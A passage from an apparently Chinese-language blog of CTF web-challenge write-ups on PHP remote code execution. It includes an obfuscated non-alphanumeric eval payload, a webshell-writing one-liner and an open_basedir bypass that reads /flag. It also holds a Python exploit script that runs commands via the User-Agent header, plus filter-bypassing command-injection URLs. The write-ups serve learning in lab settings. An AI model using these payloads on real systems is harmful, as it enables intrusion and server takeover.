class="line">%24_%3d%5b%5d%3b%24_%3d%40%22%24_%22%3b%24_%3d%24_%5b&#39;!&#39;%3d%3d&#39;%40&#39;%5d%3b%24___%3d%24_%3b%24__%3d%24_%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24___.%3d%24__%3b%24___.%3d%24__%3b%24__%3d%24_%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24___.%3d%24__%3b%24__%3d%24_%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24___.%3d%24__%3b%24__%3d%24_%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24___.%3d%24__%3b%24____%3d&#39;_&#39;%3b%24__%3d%24_%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24____.%3d%24__%3b%24__%3d%24_%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24____.%3d%24__%3b%24__%3d%24_%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24____.%3d%24__%3b%24__%3d%24_%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24____.%3d%24__%3b%24_%3d%24%24____%3b%24___(%24_%5b_%5d)%3b</span><br></pre></td></tr></table></figure>

<p>接下来就可以POST传参了</p>
<p>但看完Phpinfo中的disable_functions即禁用函数之后发现题目才刚开始</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">下列函数都被禁用</span><br><span class="line">pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,system,exec,shell_exec,popen,proc_open,passthru,symlink,link,syslog,imap_open,ld,dl</span><br></pre></td></tr></table></figure>

<p>那么只能另寻他路去提权了</p>
<p>利用file_put_contents函数 第一个参数是文件名，第二个参数是内容。</p>
<p>构造</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">file_put-contents(1.php,&lt;?php @eval($_POST[&#39;a&#39;]);?&gt;);</span><br></pre></td></tr></table></figure>

<p>但发现不知道为什么蚁剑链接不上</p>
<p>那么只能其他方法了</p>
<p>利用open_basedir查看开发的目录</p>
<p>关于Open_basedir绕过</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">https:&#x2F;&#x2F;www.cnblogs.com&#x2F;LLeaves&#x2F;p&#x2F;13210005.html			介绍Open_basedir的原理</span><br><span class="line">https:&#x2F;&#x2F;www.codenong.com&#x2F;cs106005392&#x2F;					一些细节问题</span><br><span class="line">比如通过ini_set设置open_basedir为..。也因此我们可以通过chdir进入这个目录（上一级目录）如此循环直至&#x2F;。</span><br></pre></td></tr></table></figure>

<p>最后的上传内容</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1.14.71.254:28516&#x2F;?wllm&#x3D;%24_%3d%5b%5d%3b%24_%3d%40%22%24_%22%3b%24_%3d%24_%5b&#39;!&#39;%3d%3d&#39;%40&#39;%5d%3b%24___%3d%24_%3b%24__%3d%24_%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24___.%3d%24__%3b%24___.%3d%24__%3b%24__%3d%24_%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24___.%3d%24__%3b%24__%3d%24_%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24___.%3d%24__%3b%24__%3d%24_%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24___.%3d%24__%3b%24____%3d&#39;_&#39;%3b%24__%3d%24_%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24____.%3d%24__%3b%24__%3d%24_%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24____.%3d%24__%3b%24__%3d%24_%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24____.%3d%24__%3b%24__%3d%24_%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24____.%3d%24__%3b%24_%3d%24%24____%3b%24___(%24_%5b_%5d)%3b</span><br></pre></td></tr></table></figure>

<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">_&#x3D;file_put_contents(&#39;1.php&#39;,&quot;&lt;?php print_r(ini_get(&#39;open_basedir&#39;).&#39;&lt;br&gt;&#39;); print_r(getcwd().&#39;&lt;br&gt;&#39;); mkdir(&#39;test&#39;); chdir(&#39;test&#39;);  ini_set(&#39;open_basedir&#39;,&#39;..&#39;); print_r(getcwd().&#39;&lt;br&gt;&#39;); print_r(ini_get(&#39;open_basedir&#39;).&#39;&lt;br&gt;&#39;); chdir(&#39;..&#39;); chdir(&#39;..&#39;); chdir(&#39;..&#39;); ini_set(&#39;open_basedir&#39;,&#39;&#x2F;&#39;); echo file_get_contents(&#39;&#x2F;flag&#39;); ?&gt; &quot;);</span><br></pre></td></tr></table></figure>

<p>介绍ini_get(‘open_basedir’)                          open_basedir是php.ini中的一个配置选项，可以查看到开放的目录</p>
<img src="/2022/10/25/NSSCTF/10/25/NSSCTF/image-20221027190808810.png" class title="image-20221027190808810">

<p>通过:为分割线，此时开放的目录为/var/www/html和/tmp</p>
<p>getcwd()   获取当前所在目录</p>
<p>mkdir（） 创建目录</p>
<p>chdir（） 进入目录</p>
<p>ini_set(‘open_basedir’,’..’)； 利用ini对开放的路径进行修改，这里为什么这样字是因为哦我们要突破目录的限制，设置为..就可以一直返回上级目录</p>
<p>这时候我就有个问题，我们要怎么确定我们要的文件在那个目录而且文件名叫什么呢，于是我利用函数var_dump(scandir(‘/‘))进行测试</p>
<img src="/2022/10/25/NSSCTF/10/25/NSSCTF/image-20221027200850408.png" class title="image-20221027200850408">

<p>并且发现了一个小bug，当我们的var_dump(scandir(‘/‘))与&lt;/\br&gt;进行拼接的时候它居然不能正常输出，这个卡了很久</p>
<h3 id="SCTF-2021-rceme"><a href="#SCTF-2021-rceme" class="headerlink" title="[SCTF 2021]rceme"></a>[SCTF 2021]rceme</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">if(isset($_POST[&#39;cmd&#39;]))&#123;</span><br><span class="line">    $code &#x3D; $_POST[&#39;cmd&#39;];</span><br><span class="line">    if(preg_match(&#39;&#x2F;[A-Za-z0-9]|\&#39;|&quot;|&#96;|\ |,|-|\+|&#x3D;|\&#x2F;|\\|&lt;|&gt;|\$|\?|\^|&amp;|\|&#x2F;ixm&#39;,$code))&#123;</span><br><span class="line">        die(&#39;&lt;script&gt;alert(\&#39;Try harder!\&#39;);history.back()&lt;&#x2F;script&gt;&#39;);</span><br><span class="line">    &#125;else if(&#39;;&#39; &#x3D;&#x3D;&#x3D; preg_replace(&#39;&#x2F;[^\s\(\)]+?\((?R)?\)&#x2F;&#39;, &#39;&#39;, $code))&#123;</span><br><span class="line">        @eval($code);</span><br><span class="line">        die();</span><br><span class="line">    &#125;</span><br><span class="line">&#125; else &#123;</span><br><span class="line">    highlight_file(__FILE__);</span><br><span class="line">    var_dump(ini_get(&quot;disable_functions&quot;));</span><br><span class="line">&#125;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p>这一题目基本上过滤了所有可见字符，那么我们就需要想办法通过无参字符的构造进行绕过</p>
<h3 id="极客大挑战-2020-rceme"><a href="#极客大挑战-2020-rceme" class="headerlink" title="[极客大挑战 2020]rceme"></a>[极客大挑战 2020]rceme</h3><p>首先有一个前置知识点，要想获得源码，就需要知道什么是swp</p>
<img src="/2022/10/25/NSSCTF/10/25/NSSCTF/image-20221030234032979.png" class title="image-20221030234032979">

<p><strong>swp 源码泄露</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">访问&#x2F;.index.php.swp后获得文件</span><br><span class="line">通过拖到kali里用命令vim -r index.php.swp恢复文件，源码</span><br></pre></td></tr></table></figure>

<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">error_reporting(<span class="number">0</span>);</span><br><span class="line">session_start();</span><br><span class="line"><span class="keyword">if</span>(!<span class="keyword">isset</span>($_SESSION[<span class="string">&#x27;code&#x27;</span>]))&#123;</span><br><span class="line">        $_SESSION[<span class="string">&#x27;code&#x27;</span>] = substr(md5(mt_rand().sha1(mt_rand)),<span class="number">0</span>,<span class="number">5</span>);</span><br><span class="line">        <span class="comment">//获得验证数字</span></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>($_POST[<span class="string">&#x27;cmd&#x27;</span>]) <span class="keyword">and</span> <span class="keyword">isset</span>($_POST[<span class="string">&#x27;code&#x27;</span>]))&#123;</span><br><span class="line"></span><br><span class="line">        <span class="keyword">if</span>(substr(md5($_POST[<span class="string">&#x27;code&#x27;</span>]),<span class="number">0</span>,<span class="number">5</span>) !== $_SESSION[<span class="string">&#x27;code&#x27;</span>])&#123;</span><br><span class="line">                <span class="comment">//post传的code经过md5加密前五个字符，要等于session的code</span></span><br><span class="line">                <span class="keyword">die</span>(<span class="string">&#x27;&lt;script&gt;alert(\&#x27;Captcha error~\&#x27;);history.back()&lt;/script&gt;&#x27;</span>);</span><br><span class="line">        &#125;</span><br><span class="line">        $_SESSION[<span class="string">&#x27;code&#x27;</span>] = substr(md5(mt_rand().sha1(mt_rand)),<span class="number">0</span>,<span class="number">5</span>);</span><br><span class="line">        $code = $_POST[<span class="string">&#x27;cmd&#x27;</span>];</span><br><span class="line">        <span class="keyword">if</span>(strlen($code) &gt; <span class="number">70</span> <span class="keyword">or</span> preg_match(<span class="string">&#x27;/[A-Za-z0-9]|\&#x27;|&quot;|`|\ |,|\.|-|\+|=|\/|\\|&lt;|&gt;|\$|\?|\^|&amp;|\|/ixm&#x27;</span>,$code))&#123;</span><br><span class="line">                <span class="comment">//修正符:x 将模式中的空白忽略; </span></span><br><span class="line">                <span class="keyword">die</span>(<span class="string">&#x27;&lt;script&gt;alert(\&#x27;Longlone not like you~\&#x27;);history.back()&lt;/script&gt;&#x27;</span>);</span><br><span class="line">        &#125;<span class="keyword">else</span> <span class="keyword">if</span>(<span class="string">&#x27;;&#x27;</span> === preg_replace(<span class="string">&#x27;/[^\s\(\)]+?\((?R)?\)/&#x27;</span>, <span class="string">&#x27;&#x27;</span>, $code))&#123;</span><br><span class="line">                @<span class="keyword">eval</span>($code);</span><br><span class="line">                <span class="keyword">die</span>();</span><br><span class="line">        &#125;</span><br></pre></td></tr></table></figure>

<p>可以看出这应该是无参数rce</p>
<p>直接用生成无参代码的脚本书写</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">exp &#x3D; &quot;&quot;</span><br><span class="line">def urlbm(s):</span><br><span class="line">    ss &#x3D; &quot;&quot;</span><br><span class="line">    for each in s:</span><br><span class="line">        ss +&#x3D; &quot;%&quot; + str(hex(255 - ord(each)))[2:]</span><br><span class="line">    return f&quot;[~&#123;ss&#125;][!%FF](&quot;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">while True:</span><br><span class="line">    fun &#x3D; input(&quot;Firebasky&gt;: &quot;).strip(&quot;)&quot;).split(&quot;(&quot;)</span><br><span class="line">    exp &#x3D; &#39;&#39;</span><br><span class="line">    for each in fun[:-1]:</span><br><span class="line">        exp +&#x3D; urlbm(each)</span><br><span class="line">        print(exp)</span><br><span class="line">    exp +&#x3D; &quot;)&quot; * (len(fun) - 1) + &quot;;&quot;</span><br><span class="line">    print(exp)</span><br></pre></td></tr></table></figure>

<p>那么现在考虑用什么函数来构造了</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">常用的无参数函数（也可以考虑需要使用的时候再搜索）</span><br><span class="line">getallheaders()</span><br><span class="line">get_defined_vars()</span><br><span class="line">getenv()</span><br><span class="line">session_id()</span><br><span class="line">getcwd()</span><br><span class="line">dirname()</span><br><span class="line">chdir()</span><br><span class="line">数组函数</span><br><span class="line">next()</span><br><span class="line">end()</span><br></pre></td></tr></table></figure>

<p>那么我们可以利用</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">system(next(getallheaders())</span><br><span class="line">然后用过修改UA头来执行命令</span><br></pre></td></tr></table></figure>

<p>详细步骤如下</p>
<p>首先看看哪里是我们的(getallheaders())</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">POST传入</span><br><span class="line">cmd&#x3D;[~%89%9E%8D%A0%9B%8A%92%8F][~%CF]([~%98%9A%8B%9E%93%93%97%9A%9E%9B%9A%8D%8C][~%CF]());&amp;code&#x3D;193007</span><br><span class="line"></span><br><span class="line">code的内容为爆破的md5</span><br><span class="line">脚本如下</span><br><span class="line">import hashlib</span><br><span class="line">a &#x3D; input()</span><br><span class="line">for i in range(1, 200000000):</span><br><span class="line"></span><br><span class="line">    x &#x3D; hashlib.md5(str(i).encode(encoding&#x3D;&#39;UTF-8&#39;)).hexdigest()</span><br><span class="line"></span><br><span class="line">    if (x[0:5] &#x3D;&#x3D; a):</span><br><span class="line">        print(x)</span><br><span class="line">        print(i)</span><br><span class="line">        break</span><br></pre></td></tr></table></figure>

<img src="/2022/10/25/NSSCTF/10/25/NSSCTF/image-20221030235012901.png" class title="image-20221030235012901">

<p>既然能够执行那么我们就可以构造</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">system(next(getallheaders()))来完成执行命令</span><br></pre></td></tr></table></figure>

<p>然后我在搜索资料的时候发现了网上大佬写的exp,赶快学习下</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br></pre></td><td class="code"><pre><span class="line">import hashlib</span><br><span class="line">import re</span><br><span class="line">import requests</span><br><span class="line">import sys</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">url &#x3D; &#39;http:&#x2F;&#x2F;1.14.71.254:28373&#x2F;&#39;</span><br><span class="line"></span><br><span class="line">session &#x3D; requests.session()</span><br><span class="line"># 1 md5 解码</span><br><span class="line">r &#x3D; session.get(</span><br><span class="line">    url&#x3D;url,</span><br><span class="line">)</span><br><span class="line">md5_value &#x3D; re.findall(r&#39;if:substr\(md5\(\$code\),0,5\)&#x3D;&#x3D;(.+?)&quot;&#39;, r.text)[0]</span><br><span class="line">code &#x3D; &#39;&#39;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">def md5(s):</span><br><span class="line">    return hashlib.md5(s.encode()).hexdigest()</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">def demd5(code):  # 爆破md5</span><br><span class="line">    for i in range(1, 9999999):</span><br><span class="line">        if md5(str(i)).startswith(code):</span><br><span class="line">            print(&#39;[*]code:&#39;, i)</span><br><span class="line">            code &#x3D; i</span><br><span class="line">            break</span><br><span class="line">    return code</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">code &#x3D; demd5(md5_value)</span><br><span class="line"></span><br><span class="line"># 2 发送payload</span><br><span class="line">cmd &#x3D; &#39;[~%8C%86%8C%8B%9A%92][~%CF]([~%91%9A%87%8B][~%CF]([~%98%9A%8B%9E%93%93%97%9A%9E%9B%9A%8D%8C][~%CF]()));&#39;</span><br><span class="line">raw_data &#x3D; f&#39;code&#x3D;&#123;code&#125;&amp;cmd&#x3D;&#123;cmd&#125;&#39;</span><br><span class="line">r &#x3D; session.post(</span><br><span class="line">    url&#x3D;url,</span><br><span class="line">    data&#x3D;raw_data,</span><br><span class="line">    allow_redirects&#x3D;False,</span><br><span class="line">    headers&#x3D;&#123;</span><br><span class="line">        &#39;Content-Type&#39;: &#39;application&#x2F;x-www-form-urlencoded&#39;,</span><br><span class="line">        &#39;User-Agent&#39;: &#39;tac &#x2F;*&#39;,  # 执行的代码</span><br><span class="line">    &#125;</span><br><span class="line">)</span><br><span class="line">print(&#39;[*]&#39;, r.text)</span><br><span class="line"></span><br><span class="line"># phpinfo(): [~%8F%97%8F%96%91%99%90][~%CF]();</span><br><span class="line"></span><br><span class="line"># 查看shell在第几个：</span><br><span class="line"># var_dump(getallheaders())： [~%89%9E%8D%A0%9B%8A%92%8F][~%CF]([~%98%9A%8B%9E%93%93%97%9A%9E%9B%9A%8D%8C][~%CF]());</span><br><span class="line"></span><br><span class="line"># 返回shell</span><br><span class="line"># var_dump(next(getallheaders())): [~%89%9E%8D%A0%9B%8A%92%8F][~%CF]([~%91%9A%87%8B][~%CF]([~%98%9A%8B%9E%93%93%97%9A%9E%9B%9A%8D%8C][~%CF]()));</span><br><span class="line"></span><br><span class="line"># 执行shell</span><br><span class="line"># system(next(getallheaders())): [~%8C%86%8C%8B%9A%92][~%CF]([~%91%9A%87%8B][~%CF]([~%98%9A%8B%9E%93%93%97%9A%9E%9B%9A%8D%8C][~%CF]()));</span><br></pre></td></tr></table></figure>



<p>参考</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">https:&#x2F;&#x2F;blog.codesec.work&#x2F;d6b7888bcefc&#x2F;#0-%E5%89%8D%E8%A8%80</span><br><span class="line">https:&#x2F;&#x2F;f5.pm&#x2F;go-66298.html</span><br><span class="line">https:&#x2F;&#x2F;maxzed.top&#x2F;2021&#x2F;10&#x2F;01&#x2F;%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%98-2020roamphp4-rceme&#x2F;</span><br></pre></td></tr></table></figure>





<h3 id="SWPUCTF-2021-新生赛-finalrce"><a href="#SWPUCTF-2021-新生赛-finalrce" class="headerlink" title="[SWPUCTF 2021 新生赛]finalrce"></a>[SWPUCTF 2021 新生赛]finalrce</h3><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"> <span class="meta">&lt;?php</span></span><br><span class="line">highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>($_GET[<span class="string">&#x27;url&#x27;</span>]))</span><br><span class="line">&#123;</span><br><span class="line">    $url=$_GET[<span class="string">&#x27;url&#x27;</span>];</span><br><span class="line">    <span class="keyword">if</span>(preg_match(<span class="string">&#x27;/bash|nc|wget|ping|ls|cat|more|less|phpinfo|base64|echo|php|python|mv|cp|la|\-|\*|\&quot;|\&gt;|\&lt;|\%|\$/i&#x27;</span>,$url))</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="keyword">echo</span> <span class="string">&quot;Sorry,you can&#x27;t use this.&quot;</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">else</span></span><br><span class="line">    &#123;</span><br><span class="line">        <span class="keyword">echo</span> <span class="string">&quot;Can you see anything?&quot;</span>;</span><br><span class="line">        exec($url);</span><br><span class="line">    &#125;</span><br><span class="line">&#125; Sorry,you can<span class="string">&#x27;t use this.</span></span><br></pre></td></tr></table></figure>

<p>首先exec函数执行命令是没有回显的</p>
<p>那么我们需要利用其他函数搭配显示内容，那么我们就需要将执行的内容进行操作是的它能够显示或者存储在某个我们能够查看的地方</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">tee函数</span><br><span class="line">http:&#x2F;&#x2F;1.14.71.254:28976&#x2F;?url&#x3D;l\s &#x2F; | tee 1.txt</span><br><span class="line">将ls的内容存在1.txt里面</span><br><span class="line">利用url：http:&#x2F;&#x2F;1.14.71.254:28411&#x2F;1.txt 进行查看</span><br></pre></td></tr></table></figure>

<p>因此可以利用</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">l\s  绕过 ls的过滤，将目录的内容利用tee写入指定文本后查看</span><br><span class="line">同理 利用 tac 目标文件 | tee 指定文本   来获取内容</span><br></pre></td></tr></table></figure>

<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">| 管道符号</span><br><span class="line">命令格式： 命令1| 命令2</span><br><span class="line">作用：命令1的正确出书作为命令2的操作对象</span><br></pre></td></tr></table></figure>

<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">http:&#x2F;&#x2F;1.14.71.254:28491&#x2F;?url&#x3D;l\s &#x2F; | tee 1.txt							获得目录</span><br><span class="line">http:&#x2F;&#x2F;1.14.71.254:28491&#x2F;?url&#x3D;tac &#x2F;flllll\aaaaaaggggggg | tee 2.txt		记得文件前加个&#x2F;</span><br></pre></td></tr></table></figure>



